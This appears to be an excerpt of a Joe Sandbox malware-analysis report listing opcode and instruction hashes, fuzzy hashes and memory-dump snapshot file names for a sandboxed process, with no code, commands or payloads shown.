                                                            • Opcode ID: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
                                                            • Instruction ID: 1362b88ed814ce2934f285d3fcaa622a3d2c9c5cb520b1e26d2b697727dbc15f
                                                            • Opcode Fuzzy Hash: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
                                                            • Instruction Fuzzy Hash: F0F06771A4D6899FCB029F24C8658993FB0EF66300B0A01E7D009CB1A3CB299D0ACB10
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f30e8d21b362b8c2419bfa650b3b99307fd115fbe17861a6cb236b8e3d0068e
                                                            • Instruction ID: f02977efd68f7ae00c6b28c131456f9d2790b197804ed35ff2cb77927978b1b6
                                                            • Opcode Fuzzy Hash: 6f30e8d21b362b8c2419bfa650b3b99307fd115fbe17861a6cb236b8e3d0068e
                                                            • Instruction Fuzzy Hash: 53F0E231E0881A8FEB58EB54C854AFDB7B1EB94751F20067BC85693295CF786A418B44
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a0b09f0303e6507b5803ad9be41098098a08eadca0caafba64135719faaa97
                                                            • Instruction ID: be380a2d8971103c17360db25a0acd3535671c2f57fe363cd3ef4ccf5a0edca4
                                                            • Opcode Fuzzy Hash: c6a0b09f0303e6507b5803ad9be41098098a08eadca0caafba64135719faaa97
                                                            • Instruction Fuzzy Hash: 49F0C230D1C4998FE748EB68C59AABDBBE0FF64758F40017AC00EEB2D6CFA424408744
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
                                                            • Instruction ID: a4043529097e4a025b8b23797dbc8260f3771506dd05818eab9989b751c491a3
                                                            • Opcode Fuzzy Hash: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
                                                            • Instruction Fuzzy Hash: E6F0D030914A4D9FDF84EF58C444AEA7BF0FF68305F5041AAE41DD3290DB35A595CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b9e78de885504f564e5157959b7d08eed9aeae49c13f76f1574e6cdd7be6a84
                                                            • Instruction ID: 7b1fdfc56a6604a3797dacf45735370662979bab42b8ee57b687dcb5869e9a63
                                                            • Opcode Fuzzy Hash: 3b9e78de885504f564e5157959b7d08eed9aeae49c13f76f1574e6cdd7be6a84
                                                            • Instruction Fuzzy Hash: 1F01E830D4C52B8FEBA4EF18D844AB876A1FF94395F0001B9C01DD26C5CB396E818B04
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ced8a8447f1b6b4ce3a4d77f2f7ce066611247aa10ea711ce79a5149f99a093a
                                                            • Instruction ID: 6c02d846d735acbe24ec010c0afa7b04901728fc95935ff31f900db7fb77e5ce
                                                            • Opcode Fuzzy Hash: ced8a8447f1b6b4ce3a4d77f2f7ce066611247aa10ea711ce79a5149f99a093a
                                                            • Instruction Fuzzy Hash: 17F04930D0D52ACFE704EB54C8443FAB2B0FB91311F040A79D415972C2CB786A848B95
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
                                                            • Instruction ID: 95357ff0ba89b2a016f996b6a55dc9a22a3882b8c22f3668d7ae54b96f4049fc
                                                            • Opcode Fuzzy Hash: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
                                                            • Instruction Fuzzy Hash: CBF01C3190812ACEDB64EF00C8907A873F1FB54751F5441B9D04DA62D0DF786E84CF44
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
                                                            • Instruction ID: 95685bb8437eca79c1dd0228b960365542510bf5fb37e4420c2eac98ae2c5003
                                                            • Opcode Fuzzy Hash: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
                                                            • Instruction Fuzzy Hash: A6C01275D198698EF75AEF1C480477562A1FB64A44F0463A1800CE3185EB315C428B08
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
                                                            • Instruction ID: 76f3268c14a0b17498a4c0ed87e44403146b43fd8a6c88dd3ec45dc54090dd31
                                                            • Opcode Fuzzy Hash: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
                                                            • Instruction Fuzzy Hash: E3E04C70C0D26ACEEB756B1088082B9B564AF11355F1055B9D15D251C1D7795EC58F0A